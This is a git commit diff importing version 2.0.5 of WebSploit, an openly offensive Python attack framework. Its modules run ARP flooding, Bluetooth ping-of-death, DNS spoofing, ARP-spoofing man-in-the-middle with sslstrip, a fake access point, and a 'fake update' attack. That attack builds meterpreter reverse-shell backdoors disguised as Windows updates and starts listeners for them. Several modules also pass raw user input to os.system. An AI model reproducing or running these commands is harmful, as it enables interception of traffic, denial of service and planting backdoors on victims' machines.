Imported Upstream version 2.0.5 upstream/2.0.5
authorEmanuele Acri (Kali Developer) <crossbower@kali.org>
Mon, 17 Mar 2014 10:04:03 +0000 (11:04 +0100)
committerEmanuele Acri (Kali Developer) <crossbower@kali.org>
Mon, 17 Mar 2014 10:04:03 +0000 (11:04 +0100)
28 files changed:
.project [deleted file]
.pydevproject [deleted file]
LICENCE
README.txt
core/__init__.pyc [new file with mode: 0644]
core/header.py
core/menu.py
core/menu.py~ [new file with mode: 0644]
core/modules_database.py
core/update.py
core/update.py~ [new file with mode: 0644]
core/upgrade.py
modules/__init__.pyc [new file with mode: 0644]
modules/arp_dos.py
modules/bluetooth_pod.py
modules/brow_autopwn.py
modules/cloudflare_resolver.py [new file with mode: 0644]
modules/fakeap/__init__.py [deleted file]
modules/fakeap/dhcpd.conf [deleted file]
modules/fakeap/fake_ap.py [deleted file]
modules/fakeupdate/__init__.pyc [new file with mode: 0644]
modules/fakeupdate/fakeupdate.py
modules/java_applet.py
modules/mfod.py
modules/mitm.py
modules/webkiller.py
modules/wifi_honeypot.py
websploit

diff --git a/.project b/.project
deleted file mode 100644 (file)
index 8aeacdd..0000000
--- a/.project
+++ /dev/null
@@ -1,17 +0,0 @@
-<?xml version="1.0" encoding="UTF-8"?>
-<projectDescription>
-       <name>wsf</name>
-       <comment></comment>
-       <projects>
-       </projects>
-       <buildSpec>
-               <buildCommand>
-                       <name>org.python.pydev.PyDevBuilder</name>
-                       <arguments>
-                       </arguments>
-               </buildCommand>
-       </buildSpec>
-       <natures>
-               <nature>org.python.pydev.pythonNature</nature>
-       </natures>
-</projectDescription>
diff --git a/.pydevproject b/.pydevproject
deleted file mode 100644 (file)
index b5da97c..0000000
+++ /dev/null
@@ -1,10 +0,0 @@
-<?xml version="1.0" encoding="UTF-8" standalone="no"?>
-<?eclipse-pydev version="1.0"?>
-
-<pydev_project>
-<pydev_pathproperty name="org.python.pydev.PROJECT_SOURCE_PATH">
-<path>/wsf</path>
-</pydev_pathproperty>
-<pydev_property name="org.python.pydev.PYTHON_PROJECT_VERSION">python 2.7</pydev_property>
-<pydev_property name="org.python.pydev.PYTHON_PROJECT_INTERPRETER">Default</pydev_property>
-</pydev_project>
diff --git a/LICENCE b/LICENCE
index cdd8a50..b615afe 100644 (file)
--- a/LICENCE
+++ b/LICENCE
@@ -5,6 +5,5 @@ Licence For:
 BackBox
 BackTrack
 BlackBuntu
-Kali
 And All Hacking And Security Distro
 ------------------
index b0e106f..a90b6c5 100644 (file)
@@ -21,14 +21,11 @@ Supported Attack :
 #      [+]MFOD Attack - Middle Finger Of Doom Attack
 #      [+]Java Applet Attack Vector 
 #      [+]ARP DOS - ARP Cache Denial Of Service Attack With Random MAC
-#       [+]ARP Poisoner
 #      [+]Directory Scanner - Scan Target Directorys
 #      [+]Apache US - Scan Apache users
 #      [+]PHPMyAdmin - Scan PHPMyAdmin Login Page
 #      [+]Web Killer - Using From The TCPKill For Down Your WebSite On Network
 #      [+]Fake AP - Fake Access Point
 #      [+]FakeUpdate - Fake update attack 
-#       [+]Wifi Jammer - Wifi Jammer Attack
-#       [+]Wifi Dos - Wifi Dos RQ Attack
-#       [+]Wifi Honeypot
-#       [+]Bluetooth POD Attack
+#   [+]Wifi Jammer - Wifi Jammer Attack
+#   [+]Wifi Dos - Wifi Dos RQ Attack
diff --git a/core/__init__.pyc b/core/__init__.pyc
new file mode 100644 (file)
index 0000000..0d60b1c
Binary files /dev/null and b/core/__init__.pyc differ
index 229a216..548ca37 100644 (file)
@@ -38,13 +38,36 @@ def main_header():
                                  |_|           """
 
 
-       hdr_num = random.randint(1, 3)
+
+       header_4 = r"""
+ __    __    ___  ____    _____ ____  _       ___  ____  ______ 
+|  |__|  |  /  _]|    \  / ___/|    \| |     /   \|    ||      |
+|  |  |  | /  [_ |  o  )(   \_ |  o  ) |    |     ||  | |      |
+|  |  |  ||    _]|     | \__  ||   _/| |___ |  O  ||  | |_|  |_|
+|  `  '  ||   [_ |  O  | /  \ ||  |  |     ||     ||  |   |  |  
+ \      / |     ||     | \    ||  |  |     ||     ||  |   |  |  
+  \_/\_/  |_____||_____|  \___||__|  |_____| \___/|____|  |__|  
+                                                                """
+                                                                
+       header_5 = r"""
+db   d8b   db d88888b d8888b. .d8888. d8888b. db       .d88b.  d888888b d888888b 
+88   I8I   88 88'     88  `8D 88'  YP 88  `8D 88      .8P  Y8.   `88'   `~~88~~' 
+88   I8I   88 88ooooo 88oooY' `8bo.   88oodD' 88      88    88    88       88    
+Y8   I8I   88 88~~~~~ 88~~~b.   `Y8b. 88~~~   88      88    88    88       88    
+`8b d8'8b d8' 88.     88   8D db   8D 88      88booo. `8b  d8'   .88.      88    
+ `8b8' `8d8'  Y88888P Y8888P' `8888Y' 88      Y88888P  `Y88P'  Y888888P    YP    """
+       hdr_num = random.randint(1, 5)
        if hdr_num ==1:
                print header_1
        if hdr_num ==2:
                print header_2
        if hdr_num ==3:
                print header_3
+       if hdr_num ==4:
+               print header_4
+       if hdr_num ==5:
+               print header_5
 
 
        
index ec73393..f9391d7 100644 (file)
@@ -10,8 +10,8 @@ def main_info():
        ston = wcolors.color.BLUE + "[" + wcolors.color.ENDC
        print ""
        print "\t\t--=" + ston + "WebSploit FrameWork"
-       print "\t+---**---==" + ston + "Version :" + wcolors.color.RED + "2.0.4" + wcolors.color.ENDC
-       print "\t+---**---==" + ston + "Codename :" + wcolors.color.RED + "MegaTron" + wcolors.color.ENDC
+       print "\t+---**---==" + ston + "Version :" + wcolors.color.RED + "2.0.5 BETA" + wcolors.color.ENDC
+       print "\t+---**---==" + ston + "Codename :" + wcolors.color.RED + "We're Not Crying Wolf" + wcolors.color.ENDC
        print "\t+---**---==" + ston + "Available Modules : " + wcolors.color.GREEN + "19" + wcolors.color.ENDC
-       print "\t\t--=" + ston + "Update Date : [" + wcolors.color.RED + "r2.0.4-111 13.6.2013" + wcolors.color.ENDC + "]"
+       print "\t\t--=" + ston + "Update Date : [" + wcolors.color.RED + "r2.0.5-000 2.3.2014" + wcolors.color.ENDC + "]"
        print "\n\n"
diff --git a/core/menu.py~ b/core/menu.py~
new file mode 100644 (file)
index 0000000..6e06059
--- /dev/null
@@ -0,0 +1,20 @@
+#!/usr/bin/env python
+#
+# WebSploit FrameWork Menu module
+# Created By 0x0ptim0us (Fardin Allahverdinazhand)
+# Email : 0x0ptim0us@Gmail.Com
+
+from core import wcolors
+
+def main_info():
+       ston = wcolors.color.BLUE + "[" + wcolors.color.ENDC
+       print ""
+       print "\t\t--=" + ston + "WebSploit FrameWork"
+       print "\t+---**---==" + ston + "Version :" + wcolors.color.RED + "2.0.1" + wcolors.color.ENDC
+       print "\t+---**---==" + ston + "Web Modules : " + wcolors.color.GREEN + "4" + wcolors.color.ENDC
+       print "\t+---**---==" + ston + "Network Modules : " + wcolors.color.GREEN + "7" + wcolors.color.ENDC
+       print "\t+---**---==" + ston + "Exploit Modules : " + wcolors.color.GREEN + "3" + wcolors.color.ENDC
+       print "\t+---**---==" + ston + "Created By :" + wcolors.color.CYAN + "Fardin Allahverdinazhand (0x0ptim0us)" + wcolors.color.ENDC
+       print "\t+---**---==" + ston + "Report Bug :" + wcolors.color.CYAN + "0x0ptim0us@Gmail.Com" + wcolors.color.ENDC
+       print "\t\t--=" + ston + "Twitter    :" + wcolors.color.CYAN + "@0x0ptim0us" + wcolors.color.ENDC
+       print "\n\n"
\ No newline at end of file
index 411c9e0..5e0bac6 100644 (file)
@@ -14,6 +14,7 @@ def modules_database():
     print "web/dir_scanner\t\t\tDirectory Scanner"
     print "web/wmap\t\t\tInformation Gathering From Victim Web Using (Metasploit Wmap)"
     print "web/pma\t\t\t\tPHPMyAdmin Login Page Scanner"
+    print "web/cloudflare_resolver\t\tCloudFlare Resolver"
     print "\n"
     print (wcolors.color.BLUE + "Network Modules\t\t\tDescription" + wcolors.color.ENDC)
     print (wcolors.color.GREEN + "-------------------\t\t---------------------" + wcolors.color.ENDC)
@@ -23,7 +24,6 @@ def modules_database():
     print "network/mlitm\t\t\tMan Left In The Middle Attack"
     print "network/webkiller\t\tTCP Kill Attack"
     print "network/fakeupdate\t\tFake Update Attack Using DNS Spoof"
-    print "network/fakeap\t\t\tFake Access Point"
     print "network/arp_poisoner\t\tArp Poisoner"
     print "\n"
     print (wcolors.color.BLUE + "Exploit Modules\t\t\tDescription" + wcolors.color.ENDC)
index 5995d91..4774a3c 100644 (file)
@@ -10,10 +10,6 @@ from core import wcolors
 from time import sleep
 
 def update():
-    print(wcolors.color.GREEN + "[*]Updating Websploit framework, Please Wait ..." + wcolors.color.ENDC)
-    sleep(2)
-    subprocess.Popen("git init", stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
-    sleep(2)
-    os.system("git pull https://github.com/websploit/update.git")
-    print(wcolors.color.GREEN + "[*]Update was completed successfully." + wcolors.color.ENDC)
-    sleep(1)
+    print(wcolors.color.RED + "[*]Sorry , This Feature Not Available in This Version ..." + wcolors.color.ENDC)
+    print(wcolors.color.BLUE + "[*]Try With 'upgrade' Command." + wcolors.color.ENDC)
+    pass
diff --git a/core/update.py~ b/core/update.py~
new file mode 100644 (file)
index 0000000..5995d91
--- /dev/null
@@ -0,0 +1,19 @@
+#!/usr/bin/env python
+#
+# WebSploit FrameWork Update Module
+# Created By 0x0ptim0us (Fardin Allahverdinazhand)
+# Email : 0x0ptim0us@Gmail.Com
+
+import os
+import subprocess
+from core import wcolors
+from time import sleep
+
+def update():
+    print(wcolors.color.GREEN + "[*]Updating Websploit framework, Please Wait ..." + wcolors.color.ENDC)
+    sleep(2)
+    subprocess.Popen("git init", stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
+    sleep(2)
+    os.system("git pull https://github.com/websploit/update.git")
+    print(wcolors.color.GREEN + "[*]Update was completed successfully." + wcolors.color.ENDC)
+    sleep(1)
index a16c637..12c5fa7 100644 (file)
@@ -14,7 +14,7 @@ def upgrade():
     try:
         cu = urllib.urlopen("http://sourceforge.net/projects/websploit/files/")
         res = cu.read()
-        if 'WebSploit Framework V.2.0.5' in res:
+        if 'WebSploit Framework V.2.1.0' in res:
             print(wcolors.color.GREEN + "[*]New Version Available")
             sleep(2)
             print("[*]Download Latest Version : https://sourceforge.net/projects/websploit/files/latest/download?source=files" + wcolors.color.ENDC)
diff --git a/modules/__init__.pyc b/modules/__init__.pyc
new file mode 100644 (file)
index 0000000..bbc82b1
Binary files /dev/null and b/modules/__init__.pyc differ
index eb9778b..66d2bea 100644 (file)
@@ -4,6 +4,7 @@
 # Created By 0x0ptim0us (Fardin Allahverdinazhand)
 # Email : 0x0ptim0us@Gmail.Com
 import os
+import subprocess
 from core import wcolors
 from core import help
 from time import sleep
@@ -51,8 +52,8 @@ def arp_dos():
                        pass
                elif com[0:3] =='run':
                        print(wcolors.color.BOLD + wcolors.color.BLUE + "[*]Attack Has Been Started ..." + wcolors.color.ENDC)
-                       command = 'xterm -e ettercap -i '+ options[2] + ' -Tq -P rand_flood ' + '/'+options[0]+'/' + ' ' + '/'+options[1]+'/'+ ' &'
-                       os.system(command)
+                       command = 'ettercap -i '+ options[2] + ' -Tq -P rand_flood ' + '/'+options[0]+'/' + ' ' + '/'+options[1]+'/'
+                       subprocess.Popen(command, stderr=subprocess.PIPE, stdout=subprocess.PIPE, shell=True)
                        line_4 = wcolors.color.UNDERL + wcolors.color.BLUE + "wsf" + wcolors.color.ENDC
                        line_4 += ":"
                        line_4 += wcolors.color.UNDERL + wcolors.color.BLUE + "ARP DOS" + wcolors.color.ENDC
index 4fd59be..9cf5cf2 100644 (file)
@@ -56,8 +56,8 @@ def bluetooth_pod():
             print(wcolors.color.BLUE + "[*]Bluetooth Ping Of Death Attack Started ..." + wcolors.color.ENDC)
             try:
                 for i in range(1, 10000):
-                    xterm_1 = "xterm -e l2ping -i %s -s %s -f %s &" % (options[0], options[2], options[1])
-                    os.system(xterm_1)
+                    xterm_1 = "l2ping -i %s -s %s -f %s &" % (options[0], options[2], options[1])
+                    subprocess.Popen(xterm_1, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)
                     sleep(3)
             except(KeyboardInterrupt, OSError):
                 print(wcolors.color.RED + "[!] Something Is Wrong ! Websploit Bluetooth_POD Module Exit." + wcolors.color.ENDC)
index c5be56a..699be18 100644 (file)
@@ -5,6 +5,7 @@
 # Email : 0x0ptim0us@Gmail.Com
 
 import os
+import subprocess
 from time import sleep
 from core import wcolors
 from core import help
@@ -44,7 +45,7 @@ def brow_autopwn():
                elif com[0:3] =='run':
                        print(wcolors.color.YELLOW + "[*]Starting WebServer ... Please Wait ..." + wcolors.color.ENDC)
                        sleep(2)
-                       os.system('xterm -e /etc/init.d/apache2 start &')
+                       subprocess.Popen('/etc/init.d/apache2 start', stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)
                        print(wcolors.color.YELLOW + "[*]Configuration DNS Spoof ... " + wcolors.color.ENDC)
                        sleep(2)
                        os.chdir('//tmp')
@@ -74,7 +75,8 @@ def brow_autopwn():
                        print(wcolors.color.YELLOW + "[*]Engine Has Been Started." + wcolors.color.ENDC)
                        sleep(2)
                        os.chdir('//tmp')
-                       os.system('xterm -e dnsspoof -i ' + options[0] + ' -f fillter.dns &')
+                       command_1 = 'dnsspoof -i ' + options[0] + ' -f fillter.dns'
+                       subprocess.Popen(command_1, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)
                        sleep(2)
                        os.system('msfcli server/browser_autopwn LHOST='+ options[1] + ' URIPATH=index E')
                else:
diff --git a/modules/cloudflare_resolver.py b/modules/cloudflare_resolver.py
new file mode 100644 (file)
index 0000000..6879951
--- /dev/null
@@ -0,0 +1,63 @@
+#!/usr/bin/env python
+#
+# WebSploit Framework CloudFlare Resolver module
+# Created By 0x0ptim0us (Fardin Allahverdinazhand)
+# Email : 0x0ptim0us@Gmail.Com
+import os
+import socket
+from core import wcolors
+from core import help
+from time import sleep
+
+options = ["google.com"]
+def cloudflare_resolver():
+    try:
+        line_1 = wcolors.color.UNDERL + wcolors.color.BLUE + "wsf" + wcolors.color.ENDC
+        line_1 += ":"
+        line_1 += wcolors.color.UNDERL + wcolors.color.BLUE + "CloudFlare Resolver" + wcolors.color.ENDC
+        line_1 += " > "
+        com = raw_input(line_1)
+        com = com.lower()
+        if com[0:10] =="set target":
+            options[0]=com[11:]
+            print "TARGET => ", options[0]
+            cloudflare_resolver()
+        elif com[0:12] =='show options':
+            print ""
+            print "Options\t\t Value\t\t\t RQ\t Description"
+            print "---------\t--------------\t\t----\t--------------"
+            print "Target\t\t"+options[0]+"\t\tyes\tTarget Address"
+            cloudflare_resolver()
+        elif com[0:2] =='os':
+            os.system(com[3:])
+            cloudflare_resolver()
+        elif com[0:4] =='help':
+            help.help()
+            cloudflare_resolver()
+        elif com[0:4] =='back':
+            pass
+        elif com[0:3] =='run':
+            sub = ('mail', 'webmail', 'email', 'direct-connect-mail',
+'direct', 'direct-connect', 'cpanel', 'ftp', 'forum', 'blog',
+'m', 'dev', 'record', 'ssl', 'dns', 'help', 'ns', 'ns1', 'ns2',
+'ns3', 'ns4', 'irc', 'server', 'status', 'status', 'portal', 'beta',
+'admin', 'imap', 'smtp')
+            try:
+                orgip = socket.gethostbyname(options[0])
+                print "[-------------------------]"
+                print "[+] Default IP Address : %s"%orgip
+                print "[-------------------------]"
+            except(socket.gaierror):
+                print "[-] Error : Host is Down !"
+            for i in sub:
+                host = i+'.'+options[0]
+                try:
+                    ip = socket.gethostbyname(host)
+                    print "[+] %s : %s"%(host, ip)
+                except(socket.gaierror):
+                    print "[-] %s : N/A"%host
+            cloudflare_resolver()
+        else:
+            print "Wrong Command =>" + com
+    except(KeyboardInterrupt):
+        print "\n[!] Operation Stoped By User."
\ No newline at end of file
diff --git a/modules/fakeap/__init__.py b/modules/fakeap/__init__.py
deleted file mode 100644 (file)
index 63a195e..0000000
+++ /dev/null
@@ -1 +0,0 @@
-__author__ = 'Optimous'\r
diff --git a/modules/fakeap/dhcpd.conf b/modules/fakeap/dhcpd.conf
deleted file mode 100644 (file)
index 1809629..0000000
+++ /dev/null
@@ -1,11 +0,0 @@
-ddns-update-style ad-hoc;\r
-default-lease-time 600;\r
-max-lease-time 7200;\r
-authoritative;\r
-subnet 10.0.0.0 netmask 255.255.255.0 {\r
-option subnet-mask 255.255.255.0;\r
-option broadcast-address 10.0.0.255;\r
-option routers 10.0.0.254;\r
-option domain-name-servers 8.8.8.8;\r
-range 10.0.0.1 10.0.0.140;\r
-}
\ No newline at end of file
diff --git a/modules/fakeap/fake_ap.py b/modules/fakeap/fake_ap.py
deleted file mode 100644 (file)
index df15957..0000000
+++ /dev/null
@@ -1,100 +0,0 @@
-#!/usr/bin/env python
-#
-# WebSploit Toolkit Fake Access Point module
-# Created By 0x0ptim0us (Fardin Allahverdinazhand)
-# Email : 0x0ptim0us@Gmail.Com
-
-from time import sleep
-from core import wcolors
-from core import help
-import os
-options = ["wlan0", "FakeAP", "11"]
-def fake_sts():
-               print(wcolors.color.RED + "[!]Notice : You Should Be Installed DHCP Before Run This Attack, If DHCP Not Installed Run This Command in Terminal :")
-               print("sudo apt-get install dhcp3-server" + wcolors.color.ENDC)
-               fake_ap()
-def fake_ap():
-       try:
-               line_1 = wcolors.color.UNDERL + wcolors.color.BLUE + "wsf" + wcolors.color.ENDC
-               line_1 += ":"
-               line_1 += wcolors.color.UNDERL + wcolors.color.BLUE + "Fake AP" + wcolors.color.ENDC
-               line_1 += " > "
-               com = raw_input(line_1)
-               com = com.lower()
-               if com[0:13] =='set interface':
-                       options[0] = com[14:20]
-                       print "INTERFACE => ", options[0]
-                       fake_ap()
-               elif com[0:9] =='set essid':
-                       options[1] = com[10:]
-                       print "ESSID => ", options[1]
-                       fake_ap()
-               elif com[0:11] =='set channel':
-                       options[2] = com[12:14]
-                       print "CHANNEL => ", options[2]
-                       fake_ap()
-               elif com[0:12] =='show options':
-                       print ""
-                       print "Options\t\t Value\t\t\t\t RQ\t Description"
-                       print "---------\t--------------\t\t\t----\t--------------"
-                       print "Interface\t"+options[0]+"\t\t\t\tyes\tWireless Interface Name"
-                       print "ESSID\t\t"+options[1]+"\t\t\t\tyes\tESSID Name For Fake AP"
-                       print "Channel\t\t"+options[2]+"\t\t\t\tyes\tChannel Number"
-                       print ""
-                       fake_ap()
-               elif com[0:2] =='os':
-                       os.system(com[3:])
-                       fake_ap()
-               elif com[0:4] =='help':
-                       help.help()
-                       fake_ap()
-               elif com[0:4] =='back':
-                       pass
-               elif com[0:3] =='run':
-                       print(wcolors.color.BLUE + "[*]Configure Fake Access Point ..." + wcolors.color.ENDC)
-                       exec_1 = "xterm -e airmon-ng start " + options[0] + " &"
-                       os.system(exec_1)
-                       exec_2 = "xterm -e airbase-ng -e " + options[1] + " -c " + options[2] + " -v " + options[0] + " &"
-                       os.system(exec_2)
-                       print(wcolors.color.BLUE + "[*]Configure iptable ..." + wcolors.color.ENDC)
-                       os.system("xterm -e ifconfig at0 up &")
-                       os.system("xterm -e ifconfig at0 10.0.0.254 netmask 255.255.255.0 &")
-                       os.system("xterm -e route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.254 &")
-                       sleep(2)
-                       os.system("xterm -e iptables --flush &")
-                       os.system("xterm -e iptables --table nat --flush &")
-                       os.system("xterm -e iptables --delete-chain &")
-                       os.system("xterm -e iptables --table nat --delete-chain &")
-                       os.system("xterm -e iptables -P FORWARD ACCEPT &")
-                       sleep(2)
-                       os.system("xterm -e iptables -t nat -A POSTROUTING -o eth3 -j MASQUERADE &")
-                       print(wcolors.color.BLUE + "[*]Clearing HDCP Leases ..." + wcolors.color.ENDC)
-                       os.system("xterm -e echo > /var/lib/dhcp3/dhcpd.leases &")
-                       os.system("xterm -e ln -s /var/run/dhcp3-server/dhcpd.pid /var/run/dhcpd.pid &")
-                       print(wcolors.color.BLUE + "[*]Enable IP Forwarding ..." + wcolors.color.ENDC)
-                       os.system("xterm -e echo 1 > /proc/sys/net/ipv4/ip_forward &")
-                       sleep(2)
-                       print(wcolors.color.BLUE + "[*]Starting DHCP Server ..." + wcolors.color.ENDC)
-                       os.system("xterm -e dhcpd3 -d -f -cf /modules/fakeap/dhcpd.conf at0 &")
-                       print(wcolors.color.GREEN + "[*]Create Fake Access Point Successful ..." + wcolors.color.ENDC)
-                       print(wcolors.color.RED + "NOTICE : When You Have Finished Attack, Press [enter] Key For Clean Up" + wcolors.color.YELLOW + " [Important]" + wcolors.color.ENDC)
-                       enter_key = raw_input()
-                       os.system('killall xterm')
-                       os.system('killall ettercap')
-                       os.system('echo "0" > /proc/sys/net/ipv4/ip_forward')
-                       os.system('iptables --flush')
-                       os.system('iptables --table nat --flush')
-                       os.system('iptables --delete-chain')
-                       os.system('iptables --table nat --delete-chain')
-               else:
-                       print "Wrong Command => ", com
-                       fake_ap()
-       except(KeyboardInterrupt):
-               print(wcolors.color.RED + "\n[*] (Ctrl + C ) Detected, Clean Up ..." + wcolors.color.ENDC)
-               os.system('killall xterm')
-               os.system('killall ettercap')
-               os.system('echo "0" > /proc/sys/net/ipv4/ip_forward')
-               os.system('iptables --flush')
-               os.system('iptables --table nat --flush')
-               os.system('iptables --delete-chain')
-               os.system('iptables --table nat --delete-chain')
diff --git a/modules/fakeupdate/__init__.pyc b/modules/fakeupdate/__init__.pyc
new file mode 100644 (file)
index 0000000..b776aa0
Binary files /dev/null and b/modules/fakeupdate/__init__.pyc differ
index 7910279..f99cc1a 100644 (file)
@@ -46,8 +46,8 @@ def fakeupdate():
         elif com[0:3] =='run':
             print(wcolors.color.CYAN + "[!]Checking Setting, Please Wait ..." + wcolors.color.ENDC)
             sleep(2)
-            os.system('xterm -e rm -rf /var/www/index.php /var/www/index.html /var/www/Linux.jpg /var/www/OSX.jpg /var/www/Windows.jpg /var/www/favicon.ico /var/www/Windows-KB183905-ENU.exe /var/www/Linux-update-EN-659 /var/www/OSX-update-HT3131 &')
-            os.system('cp modules/fakeupdate/www/* /var/www/')
+            subprocess.Popen('rm -rf /var/www/index.php /var/www/index.html /var/www/Linux.jpg /var/www/OSX.jpg /var/www/Windows.jpg /var/www/favicon.ico /var/www/Windows-KB183905-ENU.exe /var/www/Linux-update-EN-659 /var/www/OSX-update-HT3131', stderr=subprocess.PIPE, stdout=subprocess.PIPE, shell=True).wait()
+            subprocess.Popen('cp /usr/share/websploit/modules/fakeupdate/www/* /var/www/')
             print(wcolors.color.CYAN + "[*]Creating Backdoor For Windows OS ..." + wcolors.color.ENDC)
             cmd_1 = 'msfpayload windows/meterpreter/reverse_tcp LHOST=' + options[1] + ' LPORT=4441 X > /var/www/Windows-KB183905-ENU.exe'
             subprocess.Popen(cmd_1, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
@@ -60,14 +60,14 @@ def fakeupdate():
             print(wcolors.color.GREEN + "[*]Create Backdoor's Successful." + wcolors.color.ENDC)
             sleep(2)
             print(wcolors.color.BLUE + "[*]Starting Web Server ..." + wcolors.color.ENDC)
-            os.system('xterm -e service apache2 start')
+            subprocess.Popen('service apache2 start', stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
             sleep(2)
             print(wcolors.color.BLUE + "[*]Starting DNS Spoofing ..." + wcolors.color.ENDC)
             try:
                 os.chdir('/usr/local/share/ettercap')
                 check_dir = os.listdir(os.curdir)
                 if 'etter.dns' in check_dir:
-                    os.system('mv /usr/local/share/ettercap/etter.dns etter.dns.old')
+                    subprocess.Popen('mv /usr/local/share/ettercap/etter.dns etter.dns.old', stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
                 my_etter = open('etter.dns', 'w')
                 my_etter.write('*\tA' + '\t'+ options[1])
                 my_etter.close()
@@ -77,15 +77,14 @@ def fakeupdate():
                 os.chdir('/usr/share/ettercap')
                 check_dir = os.listdir(os.curdir)
                 if 'etter.dns' in check_dir:
-                    os.system('mv /usr/share/ettercap/etter.dns etter.dns.old')
+                    subprocess.Popen('mv /usr/share/ettercap/etter.dns etter.dns.old', stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
                 my_etter = open('etter.dns', 'w')
                 my_etter.write('*\tA' + '\t'+ options[1])
                 my_etter.close()
             except(OSError):
                 print(wcolors.color.BLUE +  "[*]Ettercap Launched ... [OK]" + wcolors.color.ENDC)
             dns_spoofing = 'ettercap -Tqi ' + options[0] + ' -M arp // // -P dns_spoof'
-            dns_spoofing_complete = 'xterm -e '+ dns_spoofing + ' &'
-            os.system(dns_spoofing_complete)
+            subprocess.Popen(dns_spoofing, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)
             print(wcolors.color.BLUE + "[*]Starting Listener For Windows, Linux, MacOSX ..." + wcolors.color.ENDC)
             windows_listener = 'xterm -e msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=' + options[1] + ' LPORT=4441 E &'
             linux_listener = 'xterm -e msfcli exploit/multi/handler PAYLOAD=linux/x86/meterpreter/reverse_tcp LHOST=' + options[1] + ' LPORT=4442 E &'
index 488ffb8..fa56624 100644 (file)
@@ -5,6 +5,7 @@
 # Email : 0x0ptim0us@Gmail.Com
 
 import os
+import subprocess
 from core import wcolors
 from core import help
 from time import sleep
@@ -54,7 +55,7 @@ def java_applet():
                        pass                    
                elif com[0:3] =='run':
                        print(wcolors.color.BOLD + wcolors.color.BLUE + "[*]Setting Up , Wait A Few Seconds ..." + wcolors.color.ENDC)
-                       os.system('xterm -e /etc/init.d/apache2 start')
+                       subprocess.Popen('/etc/init.d/apache2 start', stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)
                        sleep(2)
                        os.chdir('//tmp')
                        check_tmp = os.listdir(os.curdir)
@@ -75,8 +76,8 @@ def java_applet():
                        myindex.write('</body>\n')
                        myindex.write('</html>\n')
                        myindex.close()
-                       xterm1 = 'xterm -e dnsspoof -i '+ options[0] + ' -f tmp//fillter.dns &'
-                       os.system(xterm1)
+                       xterm1 = 'dnsspoof -i '+ options[0] + ' -f tmp//fillter.dns'
+                       subprocess.Popen(xterm1, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)
                        sleep(2)
                        print(wcolors.color.YELLOW + "[*]Your Index Has Been Changed...")
                        print("[*]You Can Change The Index From Here => /var/www/index.html")
index 855916c..0e85cc8 100644 (file)
@@ -49,7 +49,7 @@ def mfod():
                        pass
                elif com[0:3] =='run':
                        sleep(2)
-                       os.system('xterm -e /etc/init.d/apache2 start &')
+                       subprocess.Popen('/etc/init.d/apache2 start', stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)
                        try:
                                os.chdir('/usr/local/share/ettercap')
                                check_dir = os.listdir(os.curdir)
@@ -72,8 +72,7 @@ def mfod():
                                print(wcolors.color.RED + wcolors.color.BOLD + "[*]Checking Ettercap ... Please Wait ..." + wcolors.color.ENDC)
                        print(wcolors.color.BOLD + wcolors.color.BLUE + "[*]DNS Spoofing Starting ..." + wcolors.color.ENDC)
                        dns_spoofing = 'ettercap -Tqi ' + options[0] + ' -M arp // // -P dns_spoof'
-                       dns_spoofing_complete = 'xterm -e '+ dns_spoofing + ' &'
-                       os.system(dns_spoofing_complete)
+                       subprocess.Popen(dns_spoofing, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)
                        print(wcolors.color.BOLD + wcolors.color.BLUE + "[*]MFOD Attack Has Been Started." + wcolors.color.ENDC)
                        print(wcolors.color.BOLD + wcolors.color.RED + "[*]Notice : After Attack Press [ENTER] For Cleanup [tmp] File's" + wcolors.color.ENDC)
                        line_4 = wcolors.color.UNDERL + wcolors.color.BLUE + "wsf" + wcolors.color.ENDC
index 2c134d3..6f2685e 100644 (file)
@@ -5,6 +5,7 @@
 # Email : 0x0ptim0us@Gmail.Com
 
 import os
+import subprocess
 from core import wcolors
 from core import help
 from time import sleep
@@ -91,18 +92,17 @@ def mitm():
                                selected_sniffer = 'driftnet -i ' + options[0]
                        sleep(2)
                        if options[4] =='true':
-                               os.system('xterm -e iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000 &')
-                               os.system('xterm -e sslstrip -p -k -f &')
+                               subprocess.Popen('iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000', stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)
+                               subprocess.Popen('sslstrip -p -k -f', stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)
                        print (wcolors.color.RED + "[*]IP Forwarding ... " + wcolors.color.ENDC)
-                       ip_forwarding = 'xterm -T "WebSploit - Port Forwarding ..." -e "echo 1 > /proc/sys/net/ipv4/ip_forward"'
-                       os.system(ip_forwarding)
+                       subprocess.Popen("echo 1 > /proc/sys/net/ipv4/ip_forward", stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)
                        sleep(2)
                        print (wcolors.color.RED + "[*]ARP Spoofing ... " + wcolors.color.ENDC)
-                       arp_spoofing1 = 'xterm -e arpspoof -i ' + options[0] + ' -t ' + options[2] +' '+ options[1] + ' &'
-                       os.system(arp_spoofing1)
+                       arp_spoofing1 = 'arpspoof -i ' + options[0] + ' -t ' + options[2] +' '+ options[1]
+                       subprocess.Popen(arp_spoofing1, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)
                        sleep(2)
-                       arp_spoofing2 = 'xterm -e arpspoof -i ' + options[0] + ' -t ' + options[1] +' '+ options[2] + ' $'
-                       os.system(arp_spoofing2)
+                       arp_spoofing2 = 'arpspoof -i ' + options[0] + ' -t ' + options[1] +' '+ options[2]
+                       subprocess.Popen(arp_spoofing2, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)
